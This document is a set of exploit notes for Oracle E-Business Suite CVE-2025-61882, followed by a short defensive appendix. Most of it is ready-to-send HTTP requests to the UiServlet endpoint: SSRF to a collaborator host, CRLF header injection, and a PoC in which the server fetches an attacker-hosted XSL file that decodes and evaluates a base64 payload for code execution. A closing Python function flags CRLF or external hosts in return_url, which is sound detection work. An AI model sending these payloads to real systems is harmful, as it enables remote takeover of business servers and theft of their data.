Oracle E-Business Suite SSRF, CRLF (CVE-2025-61882)

NOT TESTED

Oracle EBS ports:
8000: Oracle HTTP Server used by EBS
7201: Oracle WebLogic, used as the servlet container

SSRF

Using Burp Suite with the Hackvertor extension, send this request to Oracle E-Business Suite. Use a Burp Collaborator address as the return_url to test.

POST /OA_HTML/configurator/UiServlet HTTP/1.1
Host: <oracle-EBS>:8000
Content-Type: application/x-www-form-urlencoded
Content-Length: 407
Connection: keep-alive

redirectFromJsp=1&getUiType=<@urlencode_all><?xml version="1.0" encoding="UTF-8"?>
<initialize>
    <param name="init_was_saved">test</param>
    <param name="return_url">http://<BURP-COLLABORATOR>.oastify.com</param>
 
    <param name="ui_def_id">0</param>
    <param name="config_effective_usage_id">0</param>
    <param name="ui_type">Applet</param>
</initialize></@urlencode_all>

SSRF + CRLF

POST /OA_HTML/configurator/UiServlet HTTP/1.1
Host: <oracle-EBS>:8000
Content-Type: application/x-www-form-urlencoded
Content-Length: 407
Connection: keep-alive

redirectFromJsp=1&getUiType=<@urlencode_all><?xml version="1.0" encoding="UTF-8"?>
<initialize>
    <param name="init_was_saved">test</param>
    <param name="return_url">http://{{external-host}}&#47;HeaderInjectionTest&#32;HTTP&#47;1&#46;1&#13;&#10;InjectedHeader&#58;Injected&#13;&#10;&#32;&#13;&#10;&#13;&#13;&#10;&#13;&#13;&#10;&#13;&#13;&#10;POST&#32;&#47;</param>
 
    <param name="ui_def_id">0</param>
    <param name="config_effective_usage_id">0</param>
    <param name="ui_type">Applet</param>
</initialize></@urlencode_all>

PoC

Host the file ieshostedsurvey.xsl on a web server on port 7201.

<xsl:stylesheet version="1.0"
  xmlns:xsl="<http://www.w3.org/1999/XSL/Transform>"
  xmlns:b64="<http://www.oracle.com/XSL/Transform/java/sun.misc.BASE64Decoder>"
  xmlns:jsm="<http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngineManager>"
  xmlns:eng="<http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngine>"
  xmlns:str="<http://www.oracle.com/XSL/Transform/java/java.lang.String>">
  <xsl:template match="/">
      <xsl:variable name="bs" select="b64:decodeBuffer(b64:new(),'[base64_encoded_payload]')"/>
      <xsl:variable name="js" select="str:new($bs)"/>
      <xsl:variable name="m" select="jsm:new()"/>
      <xsl:variable name="e" select="jsm:getEngineByName($m, 'js')"/>
      <xsl:variable name="code" select="eng:eval($e, $js)"/>
      <xsl:value-of select="$code"/>
  </xsl:template>
</xsl:stylesheet>

Send the request to EBS. The keep-alive is important!

POST /OA_HTML/configurator/UiServlet HTTP/1.1
Host: <oracle-EBS>:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
CSRF-XHR: YES
FETCH-CSRF-TOKEN: 1
Cookie: JSESSIONID=_NG5Yg8cBERFjA5L23s9UUyzG7G8hSZpYkmc6YAEBjT71alQ2UH6!906988146; EBSDB=oSVgJCh0YacxUZCwOlLajtL2zo
Content-Length: 847
Content-Type: application/x-www-form-urlencoded

redirectFromJsp=1&getUiType=<@urlencode><?xml version="1.0" encoding="UTF-8"?>
<initialize>
    <param name="init_was_saved">test</param>
    <param name="return_url"><http://<ATTACKER>:7201><@html_entities>/OA_HTML/help/../ieshostedsurvey.jsp HTTP/1.2
Host: attacker-oob-server
User-Agent: anything
Connection: keep-alive
Cookie: JSESSIONID=_NG5Yg8cBERFjA5L23s9UUyzG7G8hSZpYkmc6YAEBjT71alQ2UH6!906988146; EBSDB=oSVgJCh0YacxUZCwOlLajtL2zo
 

POST /</@html_entities></param>
 
    <param name="ui_def_id">0</param>
    <param name="config_effective_usage_id">0</param>
    <param name="ui_type">Applet</param>
</initialize></@urlencode>
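
A defender-side check for the three requests above, as an added example that is not part of the original page or of any Oracle tooling: it parses a captured UiServlet POST body and flags a return_url that carries CR/LF or points at a host outside an allow-list. The function names, finding labels, allow-list and *.example hosts are assumptions made for the example.

```python
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlencode, urlsplit

UISERVLET_PATH = "/OA_HTML/configurator/UiServlet"  # endpoint from the requests above


def inspect_uiservlet_post(path, body, allowed_hosts=frozenset()):
    """Return findings for one form-encoded POST body captured at a proxy or WAF."""
    findings = []
    if urlsplit(path).path != UISERVLET_PATH:
        return findings
    for doc in parse_qs(body, keep_blank_values=True).get("getUiType", []):
        try:
            root = ET.fromstring(doc)  # ElementTree does not fetch external entities
        except ET.ParseError:
            findings.append("unparseable-getUiType-xml")
            continue
        for param in root.iter("param"):
            if param.get("name") != "return_url":
                continue
            url = param.text or ""
            # Character references such as &#13;&#10; are decoded by the XML parser,
            # so an injected CR/LF shows up here as a literal control character.
            if "\r" in url or "\n" in url:
                findings.append("crlf-in-return_url")
            tokens = url.split()
            try:
                host = urlsplit(tokens[0]).hostname if tokens else None
            except ValueError:
                host = None
                findings.append("malformed-return_url")
            if host and host.lower() not in allowed_hosts:
                findings.append("external-return_url:" + host.lower())
    return findings


def sample_body(return_url_xml):
    """Build a constructed request body in the shape shown on this page."""
    doc = ('<?xml version="1.0" encoding="UTF-8"?><initialize>'
           '<param name="return_url">' + return_url_xml + '</param>'
           '<param name="ui_type">Applet</param></initialize>')
    return urlencode({"redirectFromJsp": "1", "getUiType": doc})


# Constructed samples; the *.example hosts are placeholders, not values from the page.
ALLOWED = frozenset({"ebs.internal.example"})
SAMPLES = {
    "benign": sample_body("http://ebs.internal.example:8000/"),
    "ssrf": sample_body("http://collab.example"),
    "crlf": sample_body("http://collab.example/x HTTP/1.1&#13;&#10;InjectedHeader: Injected&#13;&#10;"),
}
```

The same function can be run over bodies exported from proxy or WAF logs; an empty allow-list reports every return_url host it sees.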
